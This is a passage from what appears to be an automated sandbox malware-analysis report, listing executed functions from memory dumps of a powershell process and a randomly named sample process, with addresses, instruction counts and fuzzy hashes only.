                                                      • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc5227902c76976d53fdf785f9a6eb22b4a994b90a116272da4e193961bca81a
                                                      • Instruction ID: cc1113adbb46f84575954b7afe43de4c1954f7d803889aac9b6d007c7d1f21db
                                                      • Opcode Fuzzy Hash: bc5227902c76976d53fdf785f9a6eb22b4a994b90a116272da4e193961bca81a
                                                      • Instruction Fuzzy Hash: A3F09432A0D5448FE798AB48E4408A8B7E0EF64320B1100B6E109CB0A3DB2AAC608758
                                                      Function 00007FF848F341D1 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370790689.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                      • Instruction ID: 09613a87b3afa4a6477601c675d6bc6428512a03b2ca1351243ad063737339a8
                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                      • Instruction Fuzzy Hash: 34E01A31B0C8088FDAAAEB4CE0409A973E1FBB8361B1101B7D14EC75A1CB22EC518B84

                                                      Executed Functions

                                                      Function 00007FF848E61699 Relevance: .9, Instructions: 899COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2525757874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e60000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27ed7f517774ac90eefe2419c34c57e255b715d319ee45232b5b70677929d991
                                                      • Instruction ID: 3e4b6322e1a0c8f42f25478ab833b41a63d63c3fdd6a39a7f12d773f3d29e3cc
                                                      • Opcode Fuzzy Hash: 27ed7f517774ac90eefe2419c34c57e255b715d319ee45232b5b70677929d991
                                                      • Instruction Fuzzy Hash: 2D52E120E1DA495FE798FB2884966B9B7D2FF88781F840579D00ED32C7DF28A8418785
                                                      Function 00007FF848E621C9 Relevance: .2, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2525757874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e60000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4392dada8014a957fed6118a5a1a8bc72e4b354177fabda03900320d13ce24af
                                                      • Instruction ID: aa6c381756e8489241b7be154288373b3cb5bd69343dcbdb0e24b76c4409d164
                                                      • Opcode Fuzzy Hash: 4392dada8014a957fed6118a5a1a8bc72e4b354177fabda03900320d13ce24af
                                                      • Instruction Fuzzy Hash: 48511320A1E6C95FD786AB381864276BFE4EF57269F0800FBE0D9C7193DE185806C356
                                                      Function 00007FF848E61160 Relevance: .6, Instructions: 592COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2525757874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e60000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1a6c0b60fd7cbbec455445d01389cedc4bc0ec5378960802827465d30e088ac5
                                                      • Instruction ID: 0c7861e57884b63a5881be2826780482e3bff064239b02c6acf798b694e685a1
                                                      • Opcode Fuzzy Hash: 1a6c0b60fd7cbbec455445d01389cedc4bc0ec5378960802827465d30e088ac5
                                                      • Instruction Fuzzy Hash: D9419562E0DA9A5FE747E76898611F97BB0FF82251F8800F7C045DB1D3DA29280A8755
                                                      Function 00007FF848E60C0E Relevance: .2, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2525757874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e60000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b61f26146ba9c6cbc352d24d2437d46b07caf121829f7750a77af05f06a9907
                                                      • Instruction ID: c947df041e9553e94b94fb9e9ff4fc8f95d41f247a4e01304998ba91a3c94a73
                                                      • Opcode Fuzzy Hash: 4b61f26146ba9c6cbc352d24d2437d46b07caf121829f7750a77af05f06a9907
                                                      • Instruction Fuzzy Hash: 4F514621A1EADA5FE397A73C481A2757FE1EF87650B4900FAD488C7193DD1C6C46C352
                                                      Function 00007FF848E60558 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2525757874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e60000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7745d59b125a11127080191460f1f39dd493661e6037a7e7cd42c873c63cfc1c
                                                      • Instruction ID: 10ac9df4c6efe14b8ce9fc1554732a97212c24420dc278258307a151685387b8
                                                      • Opcode Fuzzy Hash: 7745d59b125a11127080191460f1f39dd493661e6037a7e7cd42c873c63cfc1c
                                                      • Instruction Fuzzy Hash: 5B31A220B1D9495FE798EA2C546A279B7D2EB98755F4405BAE00EC3297DE28AC028345
                                                      Function 00007FF848E60AA9 Relevance: .1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2525757874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e60000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4af5f882ea72ce108becfdd0f8dbd6c39f9c250c57cdd86320cd37def7bef94a
                                                      • Instruction ID: fb6860b09083bd8eb22d8578869f7096b045052e903109daad864d217cc7ad8d
                                                      • Opcode Fuzzy Hash: 4af5f882ea72ce108becfdd0f8dbd6c39f9c250c57cdd86320cd37def7bef94a
                                                      • Instruction Fuzzy Hash: E4310321F18D599FE788BB7C580A3B9B7D1FF98791F48417AE00CD3293CE28A8418752
                                                      Function 00007FF848E60961 Relevance: .1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2525757874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e60000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6213890d95a21fe8c5876f3f672ca7ba33ebf1505201e9cafa13f3ff79502bfd
                                                      • Instruction ID: 174cc9dedb4913eae2c87b79ca95fb98ee2720891c38d51cad188775bd735ce2
                                                      • Opcode Fuzzy Hash: 6213890d95a21fe8c5876f3f672ca7ba33ebf1505201e9cafa13f3ff79502bfd
                                                      • Instruction Fuzzy Hash: C731B031E1991EAFDB88FB6884A66EDB7E1FF98341F544479D009E3286CF3868018B50
                                                      Function 00007FF848E6082D Relevance: .1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2525757874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e60000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49c7a56d0330fce3ff0bff9b0f19e4fc73809ec02f69723e028dd74f735758bf
                                                      • Instruction ID: ace166929555461d6e9672e2d0c4b0954052ffb4c8e7167dcc95b09da645533f
                                                      • Opcode Fuzzy Hash: 49c7a56d0330fce3ff0bff9b0f19e4fc73809ec02f69723e028dd74f735758bf
                                                      • Instruction Fuzzy Hash: 7D31D032D4E98D6FD384EF2C94E65ED7FE1FF85244B8840B5D00993287DE646901CB91
                                                      Function 00007FF848E623A1 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2525757874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e60000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a4c77f2670c117d8defee08b86590c1a38c08fb24ccc684c6347bed260a9cca
                                                      • Instruction ID: 59c1570bca9e5be72740e8ca7cd13822cf6acba9e6e0929f38e32ff11b38be1f
                                                      • Opcode Fuzzy Hash: 7a4c77f2670c117d8defee08b86590c1a38c08fb24ccc684c6347bed260a9cca
                                                      • Instruction Fuzzy Hash: D9017B6580DA9B0FF345B6382C554B17FE0EF91292F8804A6E889D3197DF24BA458352

                                                      Executed Functions

                                                      Function 00007FF848E71699 Relevance: .9, Instructions: 899COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2608691520.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f27abf48ceda37bab4be1d00e8b531edd578dff88853d781f84b89c013dd06c5
                                                      • Instruction ID: 4dad286961daff7ee4c30a345ea394b4e30cbb3e13c5b76d9f5c06519870e7bb
                                                      • Opcode Fuzzy Hash: f27abf48ceda37bab4be1d00e8b531edd578dff88853d781f84b89c013dd06c5
                                                      • Instruction Fuzzy Hash: A752DF60B2DE495FE798FB2894553B9B7D2FF98780F5405B9E00EC32C6DE38A8418785
                                                      Function 00007FF848E721C9 Relevance: .2, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2608691520.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97bde8b26d94c568aa324cc7ff8170fd68df12837791a267e140fedd197a1bdb
                                                      • Instruction ID: 680edb19167b0feac472cfaa1a76644952f6c768aea9445b02fccf84b6729b9d
                                                      • Opcode Fuzzy Hash: 97bde8b26d94c568aa324cc7ff8170fd68df12837791a267e140fedd197a1bdb
                                                      • Instruction Fuzzy Hash: A8512120A1E6C95FD797AB781824276BFE4EF57265F0800FBE0DAC7197DE184806C346
                                                      Function 00007FF848E71160 Relevance: .6, Instructions: 597COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2608691520.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 22e71674b9ab5fe00cfedf748d07159347da864c021930307b70ca34b2c64f51
                                                      • Instruction ID: 524effd8405790e1ed27be4bbf3f800a7c1c7d2753ddbc6f054194bc8a1a43e3
                                                      • Opcode Fuzzy Hash: 22e71674b9ab5fe00cfedf748d07159347da864c021930307b70ca34b2c64f51
                                                      • Instruction Fuzzy Hash: E641B222E0DBDA5FE746A76898611F97BB1FF42291F4800F7C085DB1D3DE29280A8795
                                                      Function 00007FF848E70C0E Relevance: .2, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2608691520.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f80d5afe934c5d618c2c93fcf191dda938fc4641989cb7422d9dbae92b1bfc6
                                                      • Instruction ID: dc2937404729a27e4b7911d95b12d02b3691ed9abc96beb407892acb86b854c2
                                                      • Opcode Fuzzy Hash: 9f80d5afe934c5d618c2c93fcf191dda938fc4641989cb7422d9dbae92b1bfc6
                                                      • Instruction Fuzzy Hash: DA512421A1EBCA5FE397A77C48192757FE2EF87690B0900FAD489C7193DD1C6C468352
                                                      Function 00007FF848E70558 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2608691520.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3df3557319f0f8e0a249c63012e1b5dbfc7e0d4081e3d1bb2aa8def08305d99f
                                                      • Instruction ID: 0bffaec4d27c72ef4b65108c1f12b4fd078fe347a4d1d2678a1fdf4bf79c9eca
                                                      • Opcode Fuzzy Hash: 3df3557319f0f8e0a249c63012e1b5dbfc7e0d4081e3d1bb2aa8def08305d99f
                                                      • Instruction Fuzzy Hash: 6431A020B1D9495FE798EA3C546A279B7D2EBA8751F0405BAE00EC3297DE689C028345
                                                      Function 00007FF848E70AA9 Relevance: .1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2608691520.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b0aff5e7aba280b64a639e21c8308387798c950d9358660dde5abbc1a4394e8
                                                      • Instruction ID: e22cde0177129c03b399f31eb327f7e58d24dcecf337e2b2e26236837c81a436
                                                      • Opcode Fuzzy Hash: 1b0aff5e7aba280b64a639e21c8308387798c950d9358660dde5abbc1a4394e8
                                                      • Instruction Fuzzy Hash: 2331C321F18E499FE788B7BC585A3B9B7D1FF98751F14417AE00DC3292DE2898418792
                                                      Function 00007FF848E70961 Relevance: .1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2608691520.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f6b186ac1ffa4a9dc7ca5095e7dd88d3b94f7311c59f4500370e8ed1baa2d33
                                                      • Instruction ID: 830a6bb09fbb1acb1b1d83d758d7eb8dabebd95e1d21313526f615931bf7bd32
                                                      • Opcode Fuzzy Hash: 1f6b186ac1ffa4a9dc7ca5095e7dd88d3b94f7311c59f4500370e8ed1baa2d33
                                                      • Instruction Fuzzy Hash: 0431B370E1991E9FEB88FBA8D4656FDB7E1FF98380F5445B9D009D3286DE3868018B50
                                                      Function 00007FF848E7082D Relevance: .1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2608691520.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ea7c41473d76580a6274fe108266c9d5a6ff3dc8eb554f1d277dacc4259e7cb
                                                      • Instruction ID: 69f5855d44334663ab663a22ffe2a6727b26638ad431cfbb0ee7cf2f0650fa0a
                                                      • Opcode Fuzzy Hash: 3ea7c41473d76580a6274fe108266c9d5a6ff3dc8eb554f1d277dacc4259e7cb
                                                      • Instruction Fuzzy Hash: F1310132D0E9895FE748EB6884951AD7FA1FF993C0B8800FAD90883386DE34A900C791
                                                      Function 00007FF848E723A1 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2608691520.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b932bfa5513229cf0cce84f3f97bda2ba87be3a5e414975fca1a501ef90433a1
                                                      • Instruction ID: 62b7472d7ce9ca3d0add4ddbca26321fa650a8a1c8dd5276cfc1b6255a0ddcac
                                                      • Opcode Fuzzy Hash: b932bfa5513229cf0cce84f3f97bda2ba87be3a5e414975fca1a501ef90433a1
                                                      • Instruction Fuzzy Hash: BD017B1590CA961FF741B6382C550727FE1EFA17D1F0804BBE889C3197EE1469458352

                                                      Executed Functions

                                                      Function 00007FF848E81699 Relevance: .9, Instructions: 899COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.2703402464.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ff848e80000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84941c23177eec102ca881968f71b012b5373fdf9f38ff42264e27fe6fb0f25f
                                                      • Instruction ID: 27b4e54241f703038b9a1a4f4abbbe4554e84e3234ad3807d31b480b5fffd943
                                                      • Opcode Fuzzy Hash: 84941c23177eec102ca881968f71b012b5373fdf9f38ff42264e27fe6fb0f25f
                                                      • Instruction Fuzzy Hash: F152DF60A1DE4A5FE798FB2884656BEB7D2FF98780F440579E00EC32C6DE38A8418755
                                                      Function 00007FF848E821C9 Relevance: .2, Instructions: 211COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.2703402464.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ff848e80000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5659c293dbb3cb337313c0d88db842569a47b9bffe26c91158b07347fc9891e4
                                                      • Instruction ID: 4bb0cc12b97ff69cc23384e7ef6cfe0dde4e7b5fc6c54fdd1e066c62fd7551f7
                                                      • Opcode Fuzzy Hash: 5659c293dbb3cb337313c0d88db842569a47b9bffe26c91158b07347fc9891e4
                                                      • Instruction Fuzzy Hash: E1511220A1E6C95FD787AB78182427ABFE4EF57265F0800FBE0D9C7193DE185806C356
                                                      Function 00007FF848E81160 Relevance: .6, Instructions: 591COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.2703402464.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ff848e80000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb35a9a873db373f3c66fdfa07e97c1100c867689ef5d8087169df2c7e38161a
                                                      • Instruction ID: 8a0829e0839e1cf0040647ee87b2a931fe765cc651142b96995484f0a69e81e4
                                                      • Opcode Fuzzy Hash: bb35a9a873db373f3c66fdfa07e97c1100c867689ef5d8087169df2c7e38161a
                                                      • Instruction Fuzzy Hash: 0C41A662E1EA9A5FD746E77898610F97FB0FF42240F8901F7C045DB1E3DE29180A8759
                                                      Function 00007FF848E80C0E Relevance: .2, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.2703402464.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ff848e80000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fc5da2cf45efcc35494a3da32f31e11a9281ac2ec2d8827caa3810c9f59978f
                                                      • Instruction ID: ed5cdbff857c9009c7fdd051a2b2f2966380f5af5d7f6b430d3f763827f2ddba
                                                      • Opcode Fuzzy Hash: 9fc5da2cf45efcc35494a3da32f31e11a9281ac2ec2d8827caa3810c9f59978f
                                                      • Instruction Fuzzy Hash: C5512721A1EACA5FE396A73C48152797FD1EF87650B4940FAD488C7193DD2C5C46C362
                                                      Function 00007FF848E80558 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.2703402464.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ff848e80000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3063f8eee7342330a746f64b1bb2a2b912bd0186c8bff2e17fbd1c3c3a565935
                                                      • Instruction ID: dcb2cb5eee299b43b4611188d7cc7a4bc08df6f331738cf6435fcd36a18dbe1f
                                                      • Opcode Fuzzy Hash: 3063f8eee7342330a746f64b1bb2a2b912bd0186c8bff2e17fbd1c3c3a565935
                                                      • Instruction Fuzzy Hash: 7231B120B1D9495FE798FB3C946A279B7D2EFAC751F4401BAE00EC3297DE289C028341
                                                      Function 00007FF848E80AA9 Relevance: .1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.2703402464.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ff848e80000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 443a1990c001e7bf61301192ab3ebf3d284771bd35f62b10b2f1c06878ce0032
                                                      • Instruction ID: 7d744c9e2062862f60a2d616ab96fda0a96a7565f21e3ccc51803d470fa307dd
                                                      • Opcode Fuzzy Hash: 443a1990c001e7bf61301192ab3ebf3d284771bd35f62b10b2f1c06878ce0032
                                                      • Instruction Fuzzy Hash: 9D31D221F19D499FE788BBBC58193BDB7D1FF98751F5442BAE00CC3282DE2898018762
                                                      Function 00007FF848E80961 Relevance: .1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.2703402464.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ff848e80000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a547347d9a76ce3808499054b1214579b6057a07bab41da52d108422defab910
                                                      • Instruction ID: 7b7dd6bd88f5243134480349cdce63041b9c71696144d12168db17f9202bdb5b
                                                      • Opcode Fuzzy Hash: a547347d9a76ce3808499054b1214579b6057a07bab41da52d108422defab910
                                                      • Instruction Fuzzy Hash: 7C31AE30A1D90E9FEB48FB68D4656FEBBE1FF98300F944579D009D3286DE38A8418B51
                                                      Function 00007FF848E8082D Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.2703402464.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ff848e80000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5fd7310cbf800fb6c46ee2dcc22eb35a1744b936210e2a326cf6acd64aa061a
                                                      • Instruction ID: 1730fa4cbdebfd3abb734282b15db35444f559080a542c11fb02a3688485d571
                                                      • Opcode Fuzzy Hash: f5fd7310cbf800fb6c46ee2dcc22eb35a1744b936210e2a326cf6acd64aa061a
                                                      • Instruction Fuzzy Hash: 0131D53190E9CA9FE744FB6884A55AE7FA1FF89340F8940B5D02987387DE349941C7A1
                                                      Function 00007FF848E823A1 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.2703402464.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ff848e80000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46d9d392fa0186ce7727cdea0625da4072d285446f46ba8e5d6b2caebd2972ed
                                                      • Instruction ID: bcd7770eafbee23a78e44c77b6c219c823144fae8ca87149d597bd0990cd370a
                                                      • Opcode Fuzzy Hash: 46d9d392fa0186ce7727cdea0625da4072d285446f46ba8e5d6b2caebd2972ed
                                                      • Instruction Fuzzy Hash: 6E019E1180CB950FE345B7387C650767FE0EF91390F4804FBE488C3197ED2869458396

                                                      Executed Functions

                                                      Function 00007FF848E71699 Relevance: .9, Instructions: 899COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.3325865278.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6df9d7eae66f339a050bdd80f83de226ddbb94cd83ad73ef2c846e8630bd94c6
                                                      • Instruction ID: efab7cf580455753924f8b39cde50c1ac2822b4b0748b5f814ce5dd668b526d5
                                                      • Opcode Fuzzy Hash: 6df9d7eae66f339a050bdd80f83de226ddbb94cd83ad73ef2c846e8630bd94c6
                                                      • Instruction Fuzzy Hash: AE52D160B2DE495FEB98FB2884597B9B7D2FF98780F540579D00EC32C6DE38A8418785
                                                      Function 00007FF848E721C9 Relevance: .2, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.3325865278.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 225d951bbd3561fc0bcad24306046b587f7dfe35376419e0e438ed66013d738b
                                                      • Instruction ID: 263905138f190dcff64cf840428d3f2de1de0c6fbb48bff76a23f1300a4e307b
                                                      • Opcode Fuzzy Hash: 225d951bbd3561fc0bcad24306046b587f7dfe35376419e0e438ed66013d738b
                                                      • Instruction Fuzzy Hash: 4B512120A1E6C95FD796AB781824276BFE4EF57265F0800FBE0DAC7197DE185806C346
                                                      Function 00007FF848E71160 Relevance: .6, Instructions: 597COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.3325865278.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
